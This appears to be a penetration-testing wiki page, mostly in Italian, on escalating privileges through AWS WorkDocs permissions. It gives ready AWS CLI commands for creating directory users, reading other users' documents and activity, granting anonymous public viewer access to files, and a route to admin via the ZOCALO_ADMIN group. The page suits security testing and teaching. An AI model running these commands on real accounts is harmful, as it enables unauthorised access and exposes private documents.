AWS - WorkDocs Privesc
Reading time: 1 minute
WorkDocs
Per ulteriori informazioni su WorkDocs controlla:
AWS - Directory Services / WorkDocs Enum
workdocs:CreateUser
Crea un utente all'interno della Directory indicata, quindi avrai accesso sia a WorkDocs che a AD:
bash
# Create user (created inside the AD)
aws workdocs create-user --username testingasd --given-name testingasd --surname testingasd --password <password> --email-address name@directory.domain --organization-id <directory-id>
workdocs:GetDocument
, (workdocs:
DescribeActivities)
I file potrebbero contenere informazioni sensibili, leggili:
bash
# Get what was created in the directory
aws workdocs describe-activities --organization-id <directory-id>
# Get what each user has created
aws workdocs describe-activities --user-id "S-1-5-21-377..."
# Get file (a url to access with the content will be retreived)
aws workdocs get-document --document-id <doc-id>
workdocs:AddResourcePermissions
Se non hai accesso per leggere qualcosa, puoi semplicemente concederlo.
bash
# Add permission so anyway can see the file
aws workdocs add-resource-permissions --resource-id <id> --principals Id=anonymous,Type=ANONYMOUS,Role=VIEWER
## This will give an id, the file will be acesible in: https://<name>.awsapps.com/workdocs/index.html#/share/document/<id>
workdocs:AddUserToGroup
Puoi rendere un utente amministratore impostandolo nel gruppo ZOCALO_ADMIN.
Per farlo, segui le istruzioni di https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html
Accedi con quell'utente in workdoc e accedi al pannello di amministrazione in /workdocs/index.html#/admin
Non ho trovato alcun modo per farlo dalla cli.